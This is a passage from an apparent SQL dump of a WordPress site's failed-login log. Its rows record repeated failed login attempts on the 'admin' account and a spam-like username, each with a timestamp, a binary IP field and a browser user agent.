Firefox/62.0'),(4404,5946,1628821915.883581,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�x','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4405,5947,1628822310.335505,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���HҌ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4406,5948,1628822669.936194,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3�8�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4407,5949,1628823001.085988,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��T�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4408,5950,1628823311.203260,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4409,5951,1628823647.933111,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4410,5952,1628824107.291692,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��[�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4411,5953,1628824296.211326,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ś�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4412,5954,1628824660.152400,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4413,5955,1628824981.303295,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��MD~�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4414,5956,1628825276.813120,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��[�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4415,5957,1628825604.848505,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Yt�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4416,5958,1628825931.034525,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��D���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4417,5959,1628826252.362284,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���w','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4418,5960,1628826576.257698,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h+�5','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4419,5961,1628826899.337680,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����8','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4420,5962,1628827345.640306,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���8-2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4421,5963,1628827664.922995,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k�*�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4422,5964,1628828013.247697,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���a��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4423,5965,1628828325.336365,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4424,5966,1628828613.940443,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��H\"\"�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4425,5967,1628828928.747281,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4426,5968,1628829590.067901,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4427,5969,1628829912.761107,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���q��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4428,5970,1628830218.248709,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���a��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4429,5971,1628830498.471968,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g*:f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4430,5972,1628830840.348781,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4431,5973,1628831170.103841,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4432,5974,1628831472.134528,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4433,5975,1628831758.394661,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k�i�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4434,5976,1628831986.104347,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0���6�M','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(4435,5977,1628832109.052212,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���VE3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4436,5978,1628832405.632775,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-72c','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4437,5978,1628832405.681529,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-72c','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4438,5979,1628832716.691751,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k�g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4439,5980,1628833038.946000,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ֻ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4440,5981,1628833677.334592,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����j','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4441,5982,1628834000.716663,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���VM�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4442,5982,1628834000.739025,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���VM�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4443,5983,1628834313.046172,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0���6�M','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4'),(4444,5983,1628834313.158835,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0���6�M','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4'),(4445,5984,1628834356.870209,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4446,5985,1628834647.071337,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���c�9','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4447,5986,1628835007.326035,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Q���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4448,5986,1628835007.434682,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Q���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4449,5987,1628835301.339516,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����ro','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4450,5988,1628835631.552188,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���갞','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4451,5988,1628835631.598012,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���갞','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4452,5989,1628835956.391038,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���G�%','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4453,5990,1628836310.617209,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���.yB','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4454,5991,1628836614.955713,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��?�)','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4455,5992,1628836932.612103,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����o','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4456,5993,1628837298.594927,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4457,5993,1628837298.647576,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4458,5994,1628837616.527186,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Bs�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4459,5995,1628837912.105482,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��H�*-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4460,5996,1628838241.336338,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4461,5996,1628838241.387391,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4462,5997,1628838566.962439,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/aP3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4463,5997,1628838567.050430,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/aP3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4464,5998,1628838891.724055,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����^E','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4465,5998,1628838891.779274,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����^E','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4466,5999,1628839215.801634,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����r�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4467,6000,1628839573.271775,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����x�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4468,6001,1628839898.574834,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\\>cc','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4469,6002,1628840228.103518,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����F','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4470,6003,1628840524.033834,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����4S','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4471,6004,1628840855.943360,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QE8/','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4472,6005,1628841214.777434,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C�$�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4473,6006,1628841516.264868,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�y�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4474,6007,1628841852.234450,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���vSF','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4475,6008,1628842176.870565,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4476,6009,1628842528.808136,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��$\\[^','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4477,6010,1628842864.595048,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���-�B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4478,6011,1628843169.965833,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���S��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4479,6012,1628843524.038504,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4480,6013,1628843866.383422,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��^�x','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4481,6014,1628844196.887677,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���l��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4482,6015,1628844261.438902,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0�����\\','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),(4483,6016,1628844528.869897,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���~h','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4484,6017,1628844827.351820,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���,�7','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4485,6018,1628845162.898566,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ν-U','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4486,6019,1628845518.519431,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4487,6020,1628845840.071110,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��|��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4488,6021,1628846211.341519,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Dc�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4489,6022,1628846497.057918,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4'),(4490,6022,1628846497.107591,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4'),(4491,6023,1628846506.088537,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����V(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4492,6024,1628846875.835541,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/d�?','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4493,6025,1628847215.598470,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]qod','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4494,6026,1628847524.451102,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g��R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4495,6027,1628847892.417744,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/d�?','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4496,6027,1628847892.494555,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/d�?','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4497,6028,1628848233.585593,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����E.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4498,6029,1628848564.871022,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E1��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4499,6030,1628848917.125551,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4500,6030,1628848917.163874,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4501,6031,1628849222.077149,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gzj�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4502,6032,1628849560.639382,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;=�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4503,6032,1628849560.696407,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;=�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4504,6033,1628851805.109852,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3�T�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4505,6034,1628852170.514379,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���vSF','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4506,6035,1628852541.880801,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���S��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4507,6035,1628852541.917487,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���S��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4508,6036,1628852995.832699,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���q��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4509,6037,1628853485.280866,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N�(�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4510,6038,1628853643.737831,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4511,6039,1628853990.997553,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4512,6040,1628854499.980027,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4513,6041,1628855021.588314,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4514,6042,1628855817.037047,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��^+.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4515,6042,1628855817.093499,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��^+.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4516,6043,1628856072.489601,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\\��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4517,6044,1628856126.872082,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��Eţ�','Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53'),(4518,6045,1628856629.213180,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����K�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4519,6045,1628856629.276952,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����K�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4520,6046,1628857103.198533,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����O','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4521,6047,1628857632.114190,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Ů�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4522,6048,1628857963.464152,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3Dp^','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4523,6049,1628858177.728117,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��^+.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4524,6049,1628858177.745859,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��^+.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4525,6050,1628858857.620021,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4*','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4526,6051,1628859016.139999,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g|\\O','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4527,6052,1628859288.419668,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��k�-:','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),(4528,6052,1628859288.459311,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��k�-:','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),(4529,6053,1628859722.959408,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���l��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4530,6053,1628859723.081824,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���l��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4531,6054,1628859911.830159,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"\\U�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4532,6055,1628860595.572157,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���˰R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 